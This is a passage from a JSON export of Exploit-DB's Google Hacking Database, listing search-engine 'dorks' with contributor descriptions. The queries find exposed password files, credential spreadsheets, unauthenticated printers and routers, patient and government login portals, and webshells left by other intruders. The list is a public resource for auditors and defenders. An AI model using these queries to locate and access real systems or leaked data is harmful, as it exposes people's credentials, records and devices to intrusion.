stuff!\n\nDecoy" }, { "signatureReferenceNumber": "4095", "link": "https://www.exploit-db.com/ghdb/4095/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:users intitle:index.of", "shortDescription": "inurl:users intitle:index.of", "textualDescription": "http://www.google.com/search?q=inurl:users intitle:index.of\n\nUser folders containing interesting files.\n\nDecoy" }, { "signatureReferenceNumber": "4096", "link": "https://www.exploit-db.com/ghdb/4096/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/my.logon.php3?", "shortDescription": "inurl:/my.logon.php3?", "textualDescription": "f5 Network Remote Access Logins\n-Xploit" }, { "signatureReferenceNumber": "4097", "link": "https://www.exploit-db.com/ghdb/4097/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:.listing intitle:index.of", "shortDescription": "inurl:.listing intitle:index.of", "textualDescription": "Directories with .listing files.\nBy Rootkit Pentester." }, { "signatureReferenceNumber": "4098", "link": "https://www.exploit-db.com/ghdb/4098/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:.DS_Store intitle:index.of", "shortDescription": "inurl:.DS_Store intitle:index.of", "textualDescription": "Directories with DS_Store files.\nBy Rootkit Pentester." }, { "signatureReferenceNumber": "4099", "link": "https://www.exploit-db.com/ghdb/4099/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:/aspnet_client/system_web/", "shortDescription": "inurl:/aspnet_client/system_web/", "textualDescription": "Google dork Description: Juice Directory \"ASP\"\nGoogle search: inurl:/aspnet_client/system_web/\n\nNote:\nJuice Directory. - Yudha[at]glosmon.com" }, { "signatureReferenceNumber": "4100", "link": "https://www.exploit-db.com/ghdb/4100/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=\"sql\" \"parent\" intitle:index.of -injection", "shortDescription": "\"sql\" \"parent\" intitle:index.of -injection", "textualDescription": "Directories containing SQL Installs and/or SQL databases...\n\nDecoy" }, { "signatureReferenceNumber": "4101", "link": "https://www.exploit-db.com/ghdb/4101/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:cgi-bin/webproc?getpage=", "shortDescription": "inurl:cgi-bin/webproc?getpage=", "textualDescription": "inurl:cgi-bin/webproc?getpage=\n\nhttps://www.exploit-db.com/exploits/38488/\n\nBy JeJe Plus" }, { "signatureReferenceNumber": "4102", "link": "https://www.exploit-db.com/ghdb/4102/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:log intext:password | pass | pw", "shortDescription": "filetype:log intext:password | pass | pw", "textualDescription": "http://www.google.com/search?q=filetype:log intext:password | pass | pw\n\nLog files containing passwords...\n\nDecoy" }, { "signatureReferenceNumber": "4103", "link": "https://www.exploit-db.com/ghdb/4103/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=\"My Documents\" \"parent\" intitle:index.of", "shortDescription": "\"My Documents\" \"parent\" intitle:index.of", "textualDescription": "http://www.google.com/search?q=\"My Documents\" \"parent\" intitle:index.of\n\n\"My Documents\" folders shared on the interwebs...\n\nDecoy" }, { "signatureReferenceNumber": "4104", "link": "https://www.exploit-db.com/ghdb/4104/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=\"Desktop\" parent intitle:index.of", "shortDescription": "\"Desktop\" parent intitle:index.of", "textualDescription": "http://www.google.com/search?q=\"Desktop\" parent intitle:index.of\n\nDesktops shared on the interwebs...\n\nDecoy" }, { "signatureReferenceNumber": "4105", "link": "https://www.exploit-db.com/ghdb/4105/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:webgps intitle:\"GPS Monitoring System\"", "shortDescription": "inurl:webgps intitle:\"GPS Monitoring System\"", "textualDescription": "Login page for GPS monitoring systems.\n\n\nAuthor: Manuel Mancera (sinkmanu)" }, { "signatureReferenceNumber": "4106", "link": "https://www.exploit-db.com/ghdb/4106/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:etc -intext:etc ext:passwd", "shortDescription": "inurl:etc -intext:etc ext:passwd", "textualDescription": "Files with a lot of passwords. Enjoy healthy!.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4107", "link": "https://www.exploit-db.com/ghdb/4107/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of parent inurl:repos", "shortDescription": "intitle:index.of parent inurl:repos", "textualDescription": "http://www.google.com/search?q=intitle:index.of parent inurl:repos\n\nShared repositories. Very interesting...\n\nDecoy" }, { "signatureReferenceNumber": "4108", "link": "https://www.exploit-db.com/ghdb/4108/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of inurl:grades site:edu", "shortDescription": "intitle:index.of inurl:grades site:edu", "textualDescription": "Directories containing grades.\n\nDecoy" }, { "signatureReferenceNumber": "4109", "link": "https://www.exploit-db.com/ghdb/4109/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=\"Build ref: 26\"", "shortDescription": "\"Build ref: 26\"", "textualDescription": "Google Dork Description: Automatic Number Plate Recognition Systems (ANPRs)\nCameras\nGoogle Search: \"Build ref: 26\"\nVendor: PIPS Technology (3M)\nhttp://www.roadtraffic-technology.com/contractors/photo_enforcement/pips-technology\n\nListing of ANPRs/ALPRs cameras.\n\nJohn Jolly" }, { "signatureReferenceNumber": "4110", "link": "https://www.exploit-db.com/ghdb/4110/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "shortDescription": "\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "textualDescription": "Search for all websites built on specific versions of Joomla CMS . These\nspecific versions of Joomla could potentially be vulnerable\nto the SQL injection attack (CVE-2015-7297) .\n\nThanks\n\nDheeraj\nhttps://www.linkedin.com/in/dheerajrn\nhttps://www.facebook.com/dheeraj.pro" }, { "signatureReferenceNumber": "4111", "link": "https://www.exploit-db.com/ghdb/4111/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "shortDescription": "intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "textualDescription": "Apache Solr admin interfaces.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "4112", "link": "https://www.exploit-db.com/ghdb/4112/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "shortDescription": "ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "textualDescription": "Dork who collects a lot of data in excel file.\nBy Rootkit Pentester." }, { "signatureReferenceNumber": "4113", "link": "https://www.exploit-db.com/ghdb/4113/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:index.of inurl:openwebmail -site:openwebmail.org", "shortDescription": "intitle:index.of inurl:openwebmail -site:openwebmail.org", "textualDescription": "Sites with openwebmail installs.\n\nDecoy" }, { "signatureReferenceNumber": "4114", "link": "https://www.exploit-db.com/ghdb/4114/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "shortDescription": "inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "textualDescription": "Patient Health Portals.\n\nDecoy" }, { "signatureReferenceNumber": "4115", "link": "https://www.exploit-db.com/ghdb/4115/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "shortDescription": "inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "textualDescription": "Content Manager Login Pages.\n\nDecoy" }, { "signatureReferenceNumber": "4116", "link": "https://www.exploit-db.com/ghdb/4116/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"SmarterMail Login\" inurl:\"/Login.aspx\"", "shortDescription": "intitle:\"SmarterMail Login\" inurl:\"/Login.aspx\"", "textualDescription": "Login for SmarterMail Enterprise\n\n-Xploit" }, { "signatureReferenceNumber": "4117", "link": "https://www.exploit-db.com/ghdb/4117/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:\"Dashboard [Jenkins]\" Credentials", "shortDescription": "intitle:\"Dashboard [Jenkins]\" Credentials", "textualDescription": "Find Jenkins websites which do not require authentication to possibly\nretrieve credentials and obtain remote command execution.\n\nVulnerability: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html\n\n- Th3R3p0" }, { "signatureReferenceNumber": "4118", "link": "https://www.exploit-db.com/ghdb/4118/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:\"wp-content/uploads/private\"", "shortDescription": "inurl:\"wp-content/uploads/private\"", "textualDescription": "Directories with juicy data.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4119", "link": "https://www.exploit-db.com/ghdb/4119/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:sql intext:username intext:password", "shortDescription": "ext:sql intext:username intext:password", "textualDescription": "search turns up database files with cleartext and encryption, often leading\nto open directory structures and configuration files." }, { "signatureReferenceNumber": "4120", "link": "https://www.exploit-db.com/ghdb/4120/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:pipermail intitle:index.of parent", "shortDescription": "inurl:pipermail intitle:index.of parent", "textualDescription": "Pipermail Archives\n\nDecoy" }, { "signatureReferenceNumber": "4121", "link": "https://www.exploit-db.com/ghdb/4121/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "shortDescription": "inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "textualDescription": "Blackboard Login Portals.\n\nDecoy" }, { "signatureReferenceNumber": "4122", "link": "https://www.exploit-db.com/ghdb/4122/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "shortDescription": "inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "textualDescription": "Canvas login portals.\n\nDecoy" }, { "signatureReferenceNumber": "4123", "link": "https://www.exploit-db.com/ghdb/4123/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "shortDescription": "intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "textualDescription": "Spreadsheets with pop3 and smtp login details.\n\nDecoy" }, { "signatureReferenceNumber": "4124", "link": "https://www.exploit-db.com/ghdb/4124/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:\"ftp\" intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" | \"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "shortDescription": "inurl:\"ftp\" intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" | \"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "textualDescription": "Passwords :D\n\nDecoy" }, { "signatureReferenceNumber": "4125", "link": "https://www.exploit-db.com/ghdb/4125/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "shortDescription": "intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "textualDescription": "WinOcular Workspace Login portals.\n\nDecoy" }, { "signatureReferenceNumber": "4126", "link": "https://www.exploit-db.com/ghdb/4126/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "shortDescription": "intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "textualDescription": "Files with Passwords of http and https servers in format xls and xlsx.\nEnjoy well.\nDork By Rootkit Pentester." }, { "signatureReferenceNumber": "4127", "link": "https://www.exploit-db.com/ghdb/4127/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:\"This is Apache Hadoop release\" \"Local Logs\"", "shortDescription": "intext:\"This is Apache Hadoop release\" \"Local Logs\"", "textualDescription": "Google dork Description: bypass information Apache Hadoop Service\nGoogle search: intext:\"This is Apache Hadoop release\" \"Local Logs\"\n\nSubmited: 2015-11-12\nNote:\nview Hadoop information. - Yudha[at]glosmon.com" }, { "signatureReferenceNumber": "4128", "link": "https://www.exploit-db.com/ghdb/4128/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"router\"inurl:\"home.asp\"", "shortDescription": "intitle:\"router\"inurl:\"home.asp\"", "textualDescription": "Few routers that can be accessed without login" }, { "signatureReferenceNumber": "4129", "link": "https://www.exploit-db.com/ghdb/4129/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "shortDescription": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "textualDescription": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php\n| inurl:.us/wp-login.php" }, { "signatureReferenceNumber": "4130", "link": "https://www.exploit-db.com/ghdb/4130/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:AP Router New Generation | inurl:/home.asp", "shortDescription": "intitle:AP Router New Generation | inurl:/home.asp", "textualDescription": "Access Point Router Logins\n-Xploit" }, { "signatureReferenceNumber": "4131", "link": "https://www.exploit-db.com/ghdb/4131/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "shortDescription": "\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "textualDescription": "Servers with vulnerability who exploit in this link:\nhttps://www.exploit-db.com/exploits/13850/\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4132", "link": "https://www.exploit-db.com/ghdb/4132/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of.mail", "shortDescription": "intitle:index.of.mail", "textualDescription": "Dork with juicy info. Enjoy xD.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4133", "link": "https://www.exploit-db.com/ghdb/4133/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "shortDescription": "intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "textualDescription": "Numara Software \u00a0FootPrints Logins\n\n-Xploit" }, { "signatureReferenceNumber": "4134", "link": "https://www.exploit-db.com/ghdb/4134/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "shortDescription": "intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "textualDescription": "Roundcube Webmail Login Portals.\n\nDecoy" }, { "signatureReferenceNumber": "4135", "link": "https://www.exploit-db.com/ghdb/4135/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:Tomcat Status | inurl:/status?full=true", "shortDescription": "intitle:Tomcat Status | inurl:/status?full=true", "textualDescription": "JBOSS / Tomcat Status IP info\n-Xploit" }, { "signatureReferenceNumber": "4136", "link": "https://www.exploit-db.com/ghdb/4136/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Mail - AfterLogic WebMail\"", "shortDescription": "intitle:\"Mail - AfterLogic WebMail\"", "textualDescription": "AfterLogic WebMail Login Portals.\n\nDecoy" }, { "signatureReferenceNumber": "4137", "link": "https://www.exploit-db.com/ghdb/4137/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:index.php?id= intext:\"mysql_fetch_array\"", "shortDescription": "inurl:index.php?id= intext:\"mysql_fetch_array\"", "textualDescription": "here's a dork to find sql injectable sites in general.\ninurl can be replaced to something different...\n\nthx,\n\nDenis Muhic" }, { "signatureReferenceNumber": "4138", "link": "https://www.exploit-db.com/ghdb/4138/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "shortDescription": "-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "textualDescription": "Lots of interesting stuff!\n\nDecoy" }, { "signatureReferenceNumber": "4139", "link": "https://www.exploit-db.com/ghdb/4139/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "shortDescription": "inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "textualDescription": "Dork who show cams of traffic of a lot of cities.\nDork By Rootkit Pentester." }, { "signatureReferenceNumber": "4140", "link": "https://www.exploit-db.com/ghdb/4140/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "shortDescription": "intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "textualDescription": "this dork will return password sent in GET request from proxies logs.\n\nsubmitted by: Mohammad Al-Nasser" }, { "signatureReferenceNumber": "4141", "link": "https://www.exploit-db.com/ghdb/4141/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:net/net/airprint.html", "shortDescription": "inurl:net/net/airprint.html", "textualDescription": "Title: inurl:net/net/airprint.html\nDescription : This dork can access many printers without login.\n\nBy Sivabalan" }, { "signatureReferenceNumber": "4142", "link": "https://www.exploit-db.com/ghdb/4142/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/net/net/protocol.html", "shortDescription": "inurl:/net/net/protocol.html", "textualDescription": "Title: inurl:/net/net/protocol.html\nDescription: This dork can access many printers without login \n\nBy Sivabalan" }, { "signatureReferenceNumber": "4143", "link": "https://www.exploit-db.com/ghdb/4143/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"trace\" ext:axd intext:\"password\"", "shortDescription": "inurl:\"trace\" ext:axd intext:\"password\"", "textualDescription": "the dork keyword is:\ninurl:\"trace\" ext:axd intext:\"password\"\n\npurpose of dork:\nsearch for tracing files in the ASP.NET websites which might contain a\nsensitive information such as the username and password entered to the\napplication.\n\ndiscovered by: Asem Al Husaini (SFDA)" }, { "signatureReferenceNumber": "4144", "link": "https://www.exploit-db.com/ghdb/4144/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:/uniquesig0/ or inurl:/uniquesig0/InternalSite/", "shortDescription": "inurl:/uniquesig0/ or inurl:/uniquesig0/InternalSite/", "textualDescription": "Microsoft Forefront Unified Access Gateway - Error Pages/Logins/LogOffMsg's\n\n\n-Xploit" }, { "signatureReferenceNumber": "4145", "link": "https://www.exploit-db.com/ghdb/4145/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intext:\"Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5\"", "shortDescription": "intext:\"Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5\"", "textualDescription": "BLaSTER Webshell Footholds.\n\nDecoy" }, { "signatureReferenceNumber": "4146", "link": "https://www.exploit-db.com/ghdb/4146/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intext:\"Please select file to upload:\" ext:php", "shortDescription": "intext:\"Please select file to upload:\" ext:php", "textualDescription": "Various file upload forms - potential footholds?\n\nDecoy" }, { "signatureReferenceNumber": "4147", "link": "https://www.exploit-db.com/ghdb/4147/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:httpmon.php", "shortDescription": "inurl:httpmon.php", "textualDescription": "Dork for Zabbix Network Monitoring systems.\nDork Discovered by Rootkit Pentester." }, { "signatureReferenceNumber": "4148", "link": "https://www.exploit-db.com/ghdb/4148/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:\"Powered By OpenCart\" -site:opencart.com -inurl:\"Powered By OpenCart\" -intitle:\"OpenCart\" -intitle:\"powered by\"", "shortDescription": "intext:\"Powered By OpenCart\" -site:opencart.com -inurl:\"Powered By OpenCart\" -intitle:\"OpenCart\" -intitle:\"powered by\"", "textualDescription": "Find Open Carts for Remote File Upload vulnerability.\n\nDecoy" }, { "signatureReferenceNumber": "4149", "link": "https://www.exploit-db.com/ghdb/4149/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/cgi-bin/MANGA/index.cgi", "shortDescription": "inurl:/cgi-bin/MANGA/index.cgi", "textualDescription": "Description: This dork can access many login portal of big companies systems ( use this wisely. )\n\nBy Sivabalan ( CYBER GENIUS ).." }, { "signatureReferenceNumber": "4150", "link": "https://www.exploit-db.com/ghdb/4150/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:http | -inurl:https inurl:ftp ext:pdf taxreturn", "shortDescription": "inurl:http | -inurl:https inurl:ftp ext:pdf taxreturn", "textualDescription": "Amazing what you find with this..\n\n-Chopin" }, { "signatureReferenceNumber": "4151", "link": "https://www.exploit-db.com/ghdb/4151/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"server-status\" intext:\"Apache Server Status\"", "shortDescription": "inurl:\"server-status\" intext:\"Apache Server Status\"", "textualDescription": "Files containing juicy info\n\nThe Status module allows a server administrator to find out how well\ntheir server is performing. A HTML page is presented that gives the\ncurrent server statistics in an easily readable form. If required this\npage can be made to automatically refresh (given a compatible\nbrowser). Another page gives a simple machine-readable list of the\ncurrent server state.\n\nThe details given are:\n\nThe number of worker serving requests\nThe number of idle worker\nThe status of each worker, the number of requests that worker has\nperformed and the total number of bytes served by the worker (*)\nA total number of accesses and byte count served (*)\nThe time the server was started/restarted and the time it has been running for\nAverages giving the number of requests per second, the number of bytes\nserved per second and the average number of bytes per request (*)\nThe current percentage CPU used by each worker and in total by Apache (*)\nThe current hosts and requests being processed (*)\n\n-- \nAshish Kumar Sahu" }, { "signatureReferenceNumber": "4152", "link": "https://www.exploit-db.com/ghdb/4152/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"CPPLUS DVR -Web View\"", "shortDescription": "intitle:\"CPPLUS DVR -Web View\"", "textualDescription": "CPPLUS DVR\n\n- Stefano" }, { "signatureReferenceNumber": "4153", "link": "https://www.exploit-db.com/ghdb/4153/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:(build 13064) - Info", "shortDescription": "intitle:(build 13064) - Info", "textualDescription": "Dork for DD-WRT routers with V24 build number 13064.\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br" }, { "signatureReferenceNumber": "4154", "link": "https://www.exploit-db.com/ghdb/4154/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:wp-content/uploads filetype:xls | filetype:xlsx password", "shortDescription": "inurl:wp-content/uploads filetype:xls | filetype:xlsx password", "textualDescription": "inurl:wp-content/uploads filetype:xls | filetype:xlsx password" }, { "signatureReferenceNumber": "4155", "link": "https://www.exploit-db.com/ghdb/4155/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/node/add/event", "shortDescription": "inurl:/node/add/event", "textualDescription": "Dorks For Drupal HTML& Arbitrary File Upload Vulnerabilities\n\ninurl:/node/add/event\ninurl:/node/add/announcement\n\nThis Dork Original By Mr.XSecr3t :p\n\nNO COPAS brooh :v\n\n\n~GAME OVER~" }, { "signatureReferenceNumber": "4156", "link": "https://www.exploit-db.com/ghdb/4156/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"cgi-bin\" \"No password set!\" \" There is no password set on this router.\"", "shortDescription": "inurl:\"cgi-bin\" \"No password set!\" \" There is no password set on this router.\"", "textualDescription": "Dork reveals panels of router without passwords. Enjoy xD.\nThis Dork discovered by Rootkit Pentester." }, { "signatureReferenceNumber": "4157", "link": "https://www.exploit-db.com/ghdb/4157/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/tcpipv6.htm", "shortDescription": "inurl:/tcpipv6.htm", "textualDescription": "inurl:/tcpipv6.htm\nDescription: This google dork can access many HP LASER JET printers without login..\n\nBy Sivabalan ( CYBER GENIUS ).." }, { "signatureReferenceNumber": "4158", "link": "https://www.exploit-db.com/ghdb/4158/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/", "shortDescription": "inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/", "textualDescription": "inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/\nDescription : This google dork can access many ( LuCI Trunk based wireless system management) \n\u00a0By Sivabalan( CYBER GENIUS ) ..." }, { "signatureReferenceNumber": "4159", "link": "https://www.exploit-db.com/ghdb/4159/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/hp/device/supply_status.htm", "shortDescription": "inurl:/hp/device/supply_status.htm", "textualDescription": "inurl:/hp/device/supply_status.htm\nDescription : This google dork can access many HP LASER JET printers without login\nBy Sivabalan ( CYBER GENIUS )..." }, { "signatureReferenceNumber": "4160", "link": "https://www.exploit-db.com/ghdb/4160/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/index.htm?cat=info&pagesRemaining", "shortDescription": "inurl:/index.htm?cat=info&pagesRemaining", "textualDescription": "inurl:/index.htm?cat=info&pagesRemaining\n\nDescription: This google dork can access many HP LASER JET PRO printer..\nBy Sivabalan( CYBER GENIUS ) ..." }, { "signatureReferenceNumber": "4161", "link": "https://www.exploit-db.com/ghdb/4161/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/index.htm?cat=info&printerInfo", "shortDescription": "inurl:/index.htm?cat=info&printerInfo", "textualDescription": "inurl:/index.htm?cat=info&printerInfo\nDescription : This google dork can access many HP LASER JET printers without login..\nBy Sivabalan ( CYBER GENIUS )" }, { "signatureReferenceNumber": "4162", "link": "https://www.exploit-db.com/ghdb/4162/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=\"Stats generated by pisg v0.73\"", "shortDescription": "\"Stats generated by pisg v0.73\"", "textualDescription": "Dork with Stats for irc channels.\nDiscovered by Rootkit Pentester." }, { "signatureReferenceNumber": "4163", "link": "https://www.exploit-db.com/ghdb/4163/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:/server/webapps", "shortDescription": "inurl:/server/webapps", "textualDescription": "Google Search: inurl:/server/webapps\nSubmission Date: 12/19/2015\nDescription: Apache Tomcat information disclosure.\nby @pwns4cash" }, { "signatureReferenceNumber": "4164", "link": "https://www.exploit-db.com/ghdb/4164/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Lost Password Reset\" | inurl:/secure/pwreset.php | inurl:/portal/index.php", "shortDescription": "intitle:\"Lost Password Reset\" | inurl:/secure/pwreset.php | inurl:/portal/index.php", "textualDescription": "Lost Password Reset for Websites.\n-Xploit" }, { "signatureReferenceNumber": "4165", "link": "https://www.exploit-db.com/ghdb/4165/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/weblogin.aspx", "shortDescription": "inurl:/weblogin.aspx", "textualDescription": "inurl:/weblogin.aspx\nDescription : This google dork can access can access many login portals...\nBY Sivabalan ( CYBER GENIUS ).." }, { "signatureReferenceNumber": "4166", "link": "https://www.exploit-db.com/ghdb/4166/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/tcpipv4.htm", "shortDescription": "inurl:/tcpipv4.htm", "textualDescription": "TCP/IP Settings HP LaserJet Logins\n\n-Xploit" }, { "signatureReferenceNumber": "4167", "link": "https://www.exploit-db.com/ghdb/4167/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Microsoft+Outlook+Web+Access+Log+On\" | inurl:/owa/auth/logon.aspx", "shortDescription": "intitle:\"Microsoft+Outlook+Web+Access+Log+On\" | inurl:/owa/auth/logon.aspx", "textualDescription": "Microsoft Outlook Web Logins\u00a0\n-Xploit" }, { "signatureReferenceNumber": "4168", "link": "https://www.exploit-db.com/ghdb/4168/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=ext:html intext:Airties inurl:login.html", "shortDescription": "ext:html intext:Airties inurl:login.html", "textualDescription": "AirTies Modems\n\next:html intext:Airties inurl:login.html\n\natawho-sonadam" }, { "signatureReferenceNumber": "4169", "link": "https://www.exploit-db.com/ghdb/4169/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=\"IPSentry - Device Statistics Information\"", "shortDescription": "\"IPSentry - Device Statistics Information\"", "textualDescription": "This Dork show Device Statistics Information, about a lot of network\ninfraestructures xD. Enjoy Healthy.\nDork Discovered for Rootkit Pentester." }, { "signatureReferenceNumber": "4170", "link": "https://www.exploit-db.com/ghdb/4170/", "category": "Footholds", "querystring": "http://www.google.com/search?q=crime24 stealer ext:txt", "shortDescription": "crime24 stealer ext:txt", "textualDescription": "crime24 stealer ext:txt\natawho-sonadam-hackunity" }, { "signatureReferenceNumber": "4171", "link": "https://www.exploit-db.com/ghdb/4171/", "category": "Footholds", "querystring": "http://www.google.com/search?q=ext:php intitle:\"b374k\"", "shortDescription": "ext:php intitle:\"b374k\"", "textualDescription": "ext:php intitle:\"b374k\"\ndetails; http://atawho.blogspot.com.tr/2015/12/b374k-shell-tespiti.html\natawho-sonadam-hackunity" }, { "signatureReferenceNumber": "4172", "link": "https://www.exploit-db.com/ghdb/4172/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:\"WSO \" ext:php intext:\"server ip\" 2015 intext:\" [ home ]\"", "shortDescription": "intitle:\"WSO \" ext:php intext:\"server ip\" 2015 intext:\" [ home 